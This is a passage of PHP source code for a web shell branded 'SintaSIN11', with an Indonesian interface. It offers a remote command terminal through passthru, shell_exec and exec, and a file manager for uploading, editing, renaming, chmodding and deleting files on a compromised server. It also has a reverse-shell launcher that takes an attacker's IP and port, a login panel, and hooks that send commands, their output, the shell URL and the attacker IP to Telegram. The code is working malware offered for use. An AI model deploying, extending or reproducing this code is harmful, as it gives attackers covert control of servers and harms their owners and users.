"</a>\n"; $report_message .= "<b>Size (Bytes):</b> <code>" . @strlen($data) . "</code>\n"; send_telegram_report($report_message); echo "OK"; } exit; } if (isset($_GET['terminal']) && isset($_GET['ajax'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST') { @ob_clean(); $cwd = $_SESSION['terminal_cwd'] ?? @getcwd(); if (isset($_POST['set_dir'])) { $cwd = @realpath($_POST['set_dir']) ? @realpath($_POST['set_dir']) : $_POST['set_dir']; $_SESSION['terminal_cwd'] = $cwd; } if (!@is_dir($cwd)) { $cwd = @getcwd(); $_SESSION['terminal_cwd'] = $cwd; } $cmd = $_POST['cmd'] ?? ''; $output_for_report = ''; $is_cd = false; if (@preg_match('/^\s*cd\s*(.*)$/', $cmd, $matches)) { $is_cd = true; $path = @trim($matches[1]); if (empty($path) || $path === '~' || $path === '/') { $newDir = @getenv('HOME') ?: (@getenv('USERPROFILE') ?: '/'); } elseif ($path === '-') { $newDir = $_SESSION['prev_dir'] ?? $cwd; } else { $newDir = $cwd . DIRECTORY_SEPARATOR . $path; $resolvedDir = @realpath($newDir); $newDir = $resolvedDir ? $resolvedDir : $newDir; } if (@is_dir($newDir)) { $_SESSION['prev_dir'] = $cwd; $_SESSION['terminal_cwd'] = $newDir; $output_for_report = "Directory changed to: " . $newDir; echo "__CHDIR__:" . $newDir; } else { $output_for_report = "cd failed: No such file or directory, or permission denied."; echo "❌ cd: " . htmlspecialchars($path) . ": No such file or directory, or permission denied."; } } else { @chdir($cwd); $output = ''; $escaped_cmd = trim($cmd); if (@function_exists('passthru')) { @ob_start(); @passthru($escaped_cmd . ' 2>&1', $return_var); $output = @ob_get_clean(); } elseif (@function_exists('shell_exec')) { $output = @shell_exec($escaped_cmd . ' 2>&1'); } elseif (@function_exists('exec')) { $output_array = []; @exec($escaped_cmd . ' 2>&1', $output_array); $output = @implode("\n", $output_array); } if (empty($output) && $cmd !== '') { $disabled_functions = @ini_get('disable_functions'); $output_for_report = "Command execution failed. Disabled functions: " . (empty($disabled_functions) ? "None" : $disabled_functions); echo "❌ Command execution failed on the server.\n"; echo " - Alasan: Semua fungsi eksekusi perintah gagal atau tidak tersedia.\n"; echo " - Cek 'disable_functions': " . (empty($disabled_functions) ? "None" : htmlspecialchars($disabled_functions)) . "\n"; } else { $output_for_report = trim(substr(str_replace("\n", " | ", $output), 0, 100)) . (strlen($output) > 100 ? '...' : ''); echo $output; } } if (!$is_cd || strpos($output_for_report, 'failed') !== false) { if (!empty($cmd) || strpos($output_for_report, 'failed') !== false) { $report_message = "\u{1F4BB} <b>TERMINAL COMMAND REPORT</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Command:</b> <code>" . htmlspecialchars($cmd) . "</code>\n"; $report_message .= "<b>Output Snippet:</b> <code>" . htmlspecialchars($output_for_report) . "</code>\n"; send_telegram_report($report_message); } } exit; } $currentDir = isset($_GET['dir']) ? $_GET['dir'] : @getcwd(); $currentDir = @realpath($currentDir) ? @realpath($currentDir) : $currentDir; if (!@is_dir($currentDir)) { $currentDir = @getcwd(); } $_SESSION['terminal_cwd'] = $currentDir; ?> <style> .terminal-wrapper { background: #000; color: #0f0; font-family: 'Courier New', monospace; display: flex; flex-direction: column; height: 500px; } #terminal-output { flex: 1; padding: 10px; overflow-y: scroll; white-space: pre-wrap; font-size: 14px; line-height: 1.4; border-bottom: 2px solid #555; } #terminal-input-container { display: flex; background: #111; padding: 5px; } .prompt { color: #00ff00; padding: 8px; font-weight: bold; align-self: center; } #terminal-input { flex: 1; background: #000; color: #0f0; border: none; padding: 8px; font-family: 'Courier New', monospace; font-size: 14px; outline: none !important; } #terminal-execute { background: #00cc66; color: white; border: none; padding: 8px 12px; cursor: pointer; font-family: 'Courier New', monospace; font-size: 14px; margin-left: 5px;} #terminal-execute:hover { background: #00994d; } </style> <div class="terminal-wrapper"> <h3 style="margin-top: 0;">💻 Terminal Interaktif</h3> <p style="margin: 5px 0; color: #55ff55; font-size: 13px;">Current Directory: <span id="currentDirDisplay"><?= htmlspecialchars($currentDir) ?></span></p> <div id="terminal-output"></div> <div id="terminal-input-container"> <div class="prompt">>></div> <input type="text" id="terminal-input" autocomplete="off" placeholder="ls -la"> <button id="terminal-execute">Execute</button> </div> </div> <script> // Terminal variables let terminalInitialized = false; let currentTerminalDir = '<?= htmlspecialchars($currentDir) ?>'; let commandHistory = []; let historyIndex = 0; // Initialize terminal when modal opens function initTerminal() { if (terminalInitialized) return; const output = document.getElementById('terminal-output'); const input = document.getElementById('terminal-input'); const dirDisplay = document.getElementById('currentDirDisplay'); const executeBtn = document.getElementById('terminal-execute'); // Clear and initialize output output.innerText = "PHP Interactive Shell Ready.\nType 'help' for functions/info.\n"; output.scrollTop = output.scrollHeight; // Function to send command function sendTerminalCommand() { const cmd = input.value.trim(); if (!cmd) return; // Add to history if (commandHistory[commandHistory.length - 1] !== cmd) { commandHistory.push(cmd); } historyIndex = commandHistory.length; // Display command output.innerText += "$ " + cmd + "\n"; output.scrollTop = output.scrollHeight; input.value = ''; // Prepare data const formData = new FormData(); formData.append('cmd', cmd); formData.append('set_dir', currentTerminalDir); // Send to server fetch("?terminal=1&ajax=1", { method: "POST", body: formData }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.text(); }) .then(resp => { if (resp.startsWith("__CHDIR__:")) { currentTerminalDir = resp.substring(10); dirDisplay.innerText = currentTerminalDir; output.innerText += "Directory changed to: " + currentTerminalDir + "\n"; } else { output.innerText += resp + "\n"; } output.scrollTop = output.scrollHeight; }) .catch(error => { output.innerText += "❌ Error: " + error.message + "\n"; output.scrollTop = output.scrollHeight; }); } // Event listeners executeBtn.addEventListener('click', sendTerminalCommand); input.addEventListener('keydown', function(e) { if (e.key === 'Enter') { sendTerminalCommand(); } else if (e.key === 'ArrowUp') { e.preventDefault(); if (historyIndex > 0) { historyIndex--; input.value = commandHistory[historyIndex] || ''; } } else if (e.key === 'ArrowDown') { e.preventDefault(); if (historyIndex < commandHistory.length - 1) { historyIndex++; input.value = commandHistory[historyIndex] || ''; } else { historyIndex = commandHistory.length; input.value = ''; } } }); // Focus input input.focus(); terminalInitialized = true; } </script> <?php exit; } $rootDir = @getcwd(); $currentDir = @isset($_GET['dir']) ? $_GET['dir'] : $rootDir; $currentDir = @realpath($currentDir) ? @realpath($currentDir) : $currentDir; if (!@is_dir($currentDir)) { $currentDir = $rootDir; } @chdir($currentDir); $error = ''; if (@isset($_POST['login'])) { $pass_input = $_POST['pass'] ?? ''; $pass_attempt_hash = @md5($pass_input); $user_input = $_POST['user'] ?? ''; $user_attempt_hash = @md5($user_input); if ($user_attempt_hash === $valid_user && $pass_attempt_hash === $valid_pass) { @session_regenerate_id(true); $_SESSION['logged_in'] = true; send_telegram_report(get_initial_info() . "\n<b>Status:</b> \u{1F513} LOGIN SUCCESS\n<b>Username:</b> <code>{$user_input}</code>"); header("Location: ".$_SERVER['PHP_SELF']); exit; } else { $error = "Username atau Password salah!"; } } if (@isset($_GET['logout'])) { if (@isset($_SESSION['logged_in'])) { $report_message = "\u{1F6AA} <b>LOGOUT REPORT</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Status:</b> Logged out/Session Ended\n"; send_telegram_report($report_message); } @session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit; } if (empty($_SESSION['logged_in'])): ?> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <title>Login - SintaSIN11</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body { margin: 0; padding: 0; background: #0e0e0e url('https://res.cloudinary.com/dstvfk3po/image/upload/v1753163504/background_eza5fr.webp') no-repeat center center fixed; background-size: cover; font-family: 'Courier New', monospace; color: #eee; display: flex; justify-content: center; align-items: center; height: 100vh; } .login-box { background: rgba(0, 0, 0, 0.85); padding: 40px; border-radius: 8px; box-shadow: 0 0 10px #00ffcc; width: 300px; text-align: center; } .login-box h2 { margin-bottom: 20px; color: #00ffcc; } .login-box input[type="text"], .login-box input[type="password"] { width: 100%; padding: 10px; margin: 8px 0; background: #1a1a1a; border: 1px solid #333; border-radius: 4px; color: #0ff; } .login-box input[type="submit"] { background: #00bfff; border: none; padding: 10px; width: 100%; max-width: 100%; display: block; margin: 16px auto 0; border-radius: 4px; color: #000; font-weight: bold; cursor: pointer; } .login-box form { display: flex; flex-direction: column; align-items: center; } .login-box input[type="submit"]:hover { background: #00dfff; } .error { color: #ff4444; margin-bottom: 10px; } .footer { margin-top: 20px; font-size: 12px; color: #777; } </style> </head> <body> <div class="login-box"> <h2>LOGIN PANEL</h2> <?php if ($error) echo "<div class='error'>$error</div>"; ?> <form method="post"> <input type="text" name="user" placeholder="Username" required> <input type="password" name="pass" placeholder="Password" required> <input type="submit" name="login" value="Login"> </form> <div class="footer"> By <a href="https://t.me/SintaSIN11" target="_blank" style="color:#00bfff;">@SintaSIN11</a> </div> </div> </body> </html> <?php exit; endif; if (@isset($_SESSION['notification'])) { $notif = $_SESSION['notification']; $type = $notif['type']; $message = $notif['message']; $bgColor = ($type === 'success') ? '#4CAF50' : '#f44336'; echo "<div id='notification' style='position:fixed;top:20px;right:20px;background:$bgColor;color:white;padding:15px;border-radius:5px;z-index:9999;box-shadow:0 0 10px rgba(0,0,0,0.5);'> " . ($type === 'success' ? '✅' : '❌') . " $message </div>"; unset($_SESSION['notification']); echo "<script> setTimeout(function() { var notif = document.getElementById('notification'); if (notif) notif.style.display = 'none'; }, 3000); </script>"; } ?> <!DOCTYPE html> <html> <head> <title>PANEL SintaSIN11</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body { background: url('https://res.cloudinary.com/dstvfk3po/image/upload/v1753105097/wolf_cmybnd.webp') no-repeat center center fixed; background-size: cover; color: #ddd; font-family: monospace; margin: 0; min-height: 100vh; display: flex; flex-direction: column; } .nav { background: #222; padding: 10px; display: flex; gap: 10px; justify-content: center; flex-wrap: wrap; border-bottom: 2px solid #00ffcc; } .nav button { background: #333; color: #fff; border: none; padding: 8px 16px; border-radius: 4px; cursor: pointer; transition: 0.3s; } .nav button:hover { background: #555; box-shadow: 0 0 5px #00ffcc; } .section { padding: 20px; } a { color: #61dafb; text-decoration: none; } .modal { display: none; position: fixed; z-index: 9999; left: 0; top: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.8); } .modal-content { background: #222; margin: 5% auto; padding: 20px; width: 90%; max-width: 900px; color: #fff; border-radius: 5px; box-shadow: 0 0 15px #00ffcc; position: relative; max-height: 90vh; overflow-y: auto; } .modal-close { position: absolute; top: 10px; right: 15px; cursor: pointer; color: #aaa; font-size: 20px; } input[type="text"], input[type="number"], textarea { background: #2e2e2e; color: #fff; border: 1px solid #444; padding: 8px; width: 100%; margin: 5px 0 10px 0; box-sizing: border-box; } textarea { min-height: 200px; resize: vertical; } .file-line { display: flex; justify-content: space-between; align-items: center; padding: 4px 0; border-top: 1px solid #333; } .file-line:hover { background: rgba(255, 255, 255, 0.08); } .file-line:first-child { border-top: none; } .file-line > span { white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .file-line-header > span:nth-child(2), .file-line > span:nth-child(2) { flex: 1.5; text-align: center; } footer { background: #111; border-top: 1px solid #333; color: #777; text-align: center; padding: 15px; font-size: 12px; } footer a { color: #00bfff; text-decoration: none; } footer > div { margin-top: 5px; } @media (max-width: 768px) { .header-info { flex-direction: column !important; align-items: center !important; } .header-info > div:first-child { width: 100%; margin-bottom: 10px; } .nav { flex-direction: row; } .nav button, .nav form { margin: 5px 2px; } .file-line { flex-wrap: wrap; } .file-line > span:nth-child(1) { flex: 1 1 100%; margin-bottom: 5px; } .file-line > span:nth-child(2) { order: 3; flex: 1 1 50%; text-align: left !important; } .file-line > span:nth-child(3) { order: 2; flex: 1 1 50%; text-align: right !important; } } </style> </head> <body> <div class="header-info" style="display: flex; justify-content: space-between; align-items: flex-start; background: #111; color: #00ffcc; padding: 20px; border-bottom: 1px solid #444;"> <div style="flex: 1;"> <div style="font-size: 24px; font-weight: bold;">PANEL SintaSIN11</div> <div style="font-size: 14px; color: #ffcc00; margin-top: 5px;">Version: <?= WEBSHELL_VERSION; ?></div> <div style="max-width: 100%; width: 100%; border-top: 1px solid #444; margin: 10px 0;"></div> <div style="font-size: 13px; color: #ccc; line-height: 1.5;"> <b>SERVER INFO:</b><br> OS: <?= @php_uname(); ?><br> PHP Version: <?= @phpversion(); ?><br> Disabled Functions: <?= @ini_get('disable_functions') ?: 'None'; ?><br> Working Dir: <code><?= htmlspecialchars($currentDir); ?></code> </div> </div> <div style="flex: 0 0 160px; text-align: center;"> <img src="https://res.cloudinary.com/dstvfk3po/image/upload/v1728405789/SINTASIN2_lncxzy.jpg" style="width: 120px; height: 120px; object-fit: cover; border-radius: 8px; box-shadow: 0 0 8px #00ffcc;"> <div style="margin-top: 8px;"> <a href="https://t.me/SintaSIN11" target="_blank" style="color: #00bfff; font-size: 13px;"> <img src="https://cdn-icons-png.flaticon.com/512/2111/2111646.png" style="width: 14px; height: 14px;">@SintaSIN11 </a> </div> <div style="margin-top: 15px;"> <a href="?logout=1"> <button style="padding: 6px 14px; background-color: #ff4444; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-family: monospace;"> 🚪 Logout </button> </a> </div> </div> </div> <div class="nav" style="flex-wrap: wrap; gap: 5px;"> <a href="?dir=<?= urlencode($rootDir); ?>"><button>🏠 Home</button></a> <form method="post" enctype="multipart/form-data" style="display:inline;" id="uploadForm"> <input type="file" name="upload_file" id="uploadFile" style="display:none;" onchange="document.getElementById('uploadForm').submit()"> <button type="button" onclick="document.getElementById('uploadFile').click()">⬆️ Upload File</button> </form> <form method="post" style="display:inline-flex; align-items:center;"> <input type="text" name="folder_name" placeholder="📂 Folder Name" style="padding:4px; max-width:110px;"> <button type="submit" name="create_folder" style="height: 35px; margin-left: 5px;">Create Folder</button> </form> <form method="post" style="display:inline-flex; align-items:center;"> <input type="text" name="file_name" placeholder="📄 File.txt" style="padding:4px; max-width:110px;"> <button type="submit" name="create_file" style="height: 35px; margin-left: 5px;">Create File</button> </form> <button onclick="openModalWithURL('?terminal=1&ajax=1&dir=<?= urlencode($currentDir) ?>'); return false;">💻 Terminal</button> <button onclick="initReverseShell()">📡 Reverse Shell</button> <button onclick="openModalWithURL('?shell_finder=1&ajax=1')">🔎</button> <button onclick="openModalWithURL('?defense_shell=1&ajax=1')">🛡️</button> </div> <main style="flex: 1; overflow-y: auto;"> <div class="section"> <h3>File Manager</h3> <?php $items = @scandir($currentDir); if ($items === false) { echo "<p style='color:red;'>Gagal membaca isi direktori: Permission Denied atau Path Tidak Valid ({$currentDir}).</p>"; $items = []; } else { $dirs = @array_filter($items, function($item) use ($currentDir) { return ($item !== '.' && $item !== '..' && @is_dir($currentDir . DIRECTORY_SEPARATOR . $item)); }); $files = @array_filter($items, function($item) use ($currentDir) { return ($item !== '.' && $item !== '..' && @is_file($currentDir . DIRECTORY_SEPARATOR . $item)); }); @sort($dirs); @sort($files); $items = @array_merge(['..'], $dirs, $files); } $parent = @dirname($currentDir); $is_root_dir = false; if (@realpath($currentDir) === '/' || empty($currentDir) || $parent === $currentDir) { $is_root_dir = true; } if ($parent === $currentDir) { if (@realpath($currentDir) === '/') { $is_root_dir = true; } $parent = '/'; } else { $is_root_dir = false; } echo "<div class='file-line file-line-header' style='font-weight: bold; padding: 4px 0; border-top: 1px solid #444; border-bottom: 2px solid #00ffcc;'>"; echo "<span style='flex: 3; max-width: 350px; color: #fff;'>Direktori</span>"; echo "<span style='text-align: center; color: #ffcc00;'>Modifikasi</span>"; echo "<span style='flex: 1; text-align: center; color: #ffcc00;'>Size</span>"; echo "<span style='flex: 1; text-align: center; color: #00ffcc;'>Perms</span>"; echo "<span style='flex: 1; text-align: right; color: #fff;'>Aksi</span>"; echo "</div>"; foreach ($items as $item) { $is_parent_dir = $item === '..'; if ($is_parent_dir && $is_root_dir) continue; $fullPath = $is_parent_dir ? $parent : @rtrim($currentDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $item; $isDir = $is_parent_dir ? true : @is_dir($fullPath); $icon = $is_parent_dir ? "↩️" : ($isDir ? "📁" : "📄"); $safe_item_name = $is_parent_dir ? 'Parent Directory' : @htmlspecialchars($item); $encoded_path = @urlencode($fullPath); $modTime = @filemtime($fullPath); $modTimeFormatted = ($modTime !== false && $modTime > 0) ? date('Y-m-d', $modTime) : 'N/A'; @$permStr = get_perms_string($fullPath); @$size = (!$isDir) ? @round(@filesize($fullPath)/1024, 2) . ' KB' : '-'; echo "<div class='file-line'>"; if ($isDir) { echo "<span style='flex: 3; max-width: 350px;'>$icon <a href='?dir=" . ($is_parent_dir ? $encoded_path : $encoded_path) . "'>$safe_item_name</a></span>"; } else { echo "<span style='flex: 3; max-width: 350px;'>$icon <a href='?download=$encoded_path' title='Download/View'>$safe_item_name</a></span>"; } echo "<span style='text-align: center; color: #ccc;'>$modTimeFormatted</span>"; echo "<span style='flex: 1; text-align: center; color: #ffcc00;'>$size</span>"; echo "<span style='flex: 1; text-align: center; cursor:pointer; color:#00ffcc;' onclick=\"openModalWithURL('?chmod_modal=$encoded_path&ajax=1');\">$permStr</span>"; echo "<span style='flex: 1; text-align: right;'>"; if (!$isDir) { echo "<a href='#' onclick=\"openModalWithURL('?edit=$encoded_path&ajax=1'); return false;\" title='Edit' style='padding-right: 5px;'>📝</a>"; } if (!$is_parent_dir) { echo "<a href='#' onclick=\"openModalWithURL('?rename=$encoded_path&ajax=1'); return false;\" title='Rename'>🔁</a>"; echo "<a href='?delete=$encoded_path&dir=" . @urlencode($currentDir) . "' onclick=\"return confirm('Hapus $safe_item_name?');\" title='Delete'>❌</a>"; } echo "</span></div>"; } ?> </div> </main> <div class="modal" id="popupModal"> <div class="modal-content"> <span class="modal-close" onclick="closeModal()">×</span> <div id="modalBody">Loading...</div> </div> </div> <div class="modal" id="reverseShellModal"> <div class="modal-content"> <span class="modal-close" onclick="closeReverseShellModal()">×</span> <h3>📡 Reverse Shell</h3> <form onsubmit="startReverseShell(event)"> <label style="font-size: 13px;">Your IP (Listening Host):</label> <input type="text" id="attackerIP" placeholder="192.168.1.100" required> <label style="font-size: 13px;">Port (Listening Port):</label> <input type="number" id="attackerPort" placeholder="4444" value="4444" required> <button type="submit" style="margin-top: 10px; background: #00bfff; color: #000; font-weight: bold;">Start Reverse Shell</button> </form> <div id="reverseShellStatus" style="margin-top: 10px; color: #fff;"></div> </div> </div> <footer> <div><a href="https://t.me/SintaSIN11" target="_blank">SintaSIN11</a> WebShell ©<?= date('Y'); ?> |</div> <div>IP Anda: <code><?= $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; ?></code></div> </footer> <script> function closeModal() { window.TerminalControlReady = false; document.getElementById('popupModal').style.display = 'none'; document.getElementById('modalBody').innerHTML = 'Loading...'; } function openModalWithURL(url) { const modal = document.getElementById('popupModal'); const body = document.getElementById('modalBody'); body.innerHTML = 'Loading...'; modal.style.display = 'block'; fetch(url) .then(res => res.text()) .then(html => { body.innerHTML = html; }) .catch(err => { body.innerHTML = '❌ Error loading modal.'; }); } function saveFile(e) { e.preventDefault(); const filePath = document.getElementById('editFilePath').value; const content = document.getElementById('fileContent').value; const status = document.getElementById('editStatus'); status.innerHTML = '🔄 Saving...'; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'save_edit=1&target_file=' + encodeURIComponent(filePath) + '&new_content=' + encodeURIComponent(content) }) .then(res => res.text()) .then(resp => { if (resp.trim() === "OK") { status.innerHTML = '<span style="color: #00ff7f;">✔ File berhasil disimpan!</span>'; setTimeout(() => { closeModal(); location.reload(); }, 1500); } else { status.innerHTML = '<span style="color: #ff4444;">❌ ' + resp + '</span>'; } }) .catch(err => { status.innerHTML = '<span style="color: #ff4444;">❌ Network Error: ' + err.message + '</span>'; }); } function submitRename(e) { e.preventDefault(); const newName = document.getElementById('newName').value; const oldPath = document.getElementById('oldPath').value; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'do_rename=1&old_path=' + encodeURIComponent(oldPath) + '&new_name=' + encodeURIComponent(newName) }) .then(res => res.text()) .then(resp => { if (resp.trim() === "OK") { const notif = document.createElement('div'); notif.id = 'notification'; notif.style.cssText = 'position:fixed;top:20px;right:20px;background:#4CAF50;color:white;padding:15px;border-radius:5px;z-index:9999;box-shadow:0 0 10px rgba(0,0,0,0.5);'; notif.innerHTML = '✅ Berhasil merubah nama!'; document.body.appendChild(notif); setTimeout(() => { notif.style.display = 'none'; closeModal(); location.reload(); }, 1000); } else { document.getElementById('renameStatus').innerHTML = '❌ ' + resp; } }); } function submitChmod(e) { e.preventDefault(); const perm = document.getElementById('newPerm').value; const file = document.getElementById('targetFile').value; const status = document.getElementById('chmodStatus'); status.innerHTML = '🔄 Mengubah permission...'; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'do_chmod=1&file=' + encodeURIComponent(file) + '&perm=' + encodeURIComponent(perm) }) .then(res => res.text()) .then(resp => { if (resp.trim() === "OK") { status.innerHTML = '<span style="color: #00ff7f;">✔ Permission diubah.</span>'; setTimeout(() => { closeModal(); location.reload(); }, 1000); } else { document.getElementById('chmodStatus').innerHTML = '❌ ' + resp; } }); } function initReverseShell() { document.getElementById('reverseShellModal').style.display = 'block'; document.getElementById('attackerIP').focus(); } function closeReverseShellModal() { document.getElementById('reverseShellModal').style.display = 'none'; document.getElementById('reverseShellStatus').innerHTML = ''; } function startReverseShell(e) { e.preventDefault(); const ip = document.getElementById('attackerIP').value; const port = document.getElementById('attackerPort').value; const status = document.getElementById('reverseShellStatus'); if (!ip || !port) { status.innerHTML = '❌ Please fill in both IP and Port'; return; } status.innerHTML = '🔄 Initiating reverse shell to ' + ip + ':' + port + '...'; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'reverse_shell=1&ip=' + encodeURIComponent(ip) + '&port=' + encodeURIComponent(port) }) .then(res => res.text()) .then(resp => { status.innerHTML = resp; }) .catch(err => { status.innerHTML = '❌ Network Error: ' + err.message; }); } window.onclick = function(event) { const modal = document.getElementById('popupModal'); const rShellModal = document.getElementById('reverseShellModal'); if (event.target == rShellModal) { closeReverseShellModal(); } if (event.target == modal) { const modalBody = document.getElementById('modalBody'); if (!modalBody || modalBody.innerHTML.indexOf('Terminal Interaktif') === -1) { closeModal(); } } } </script> </body> </html>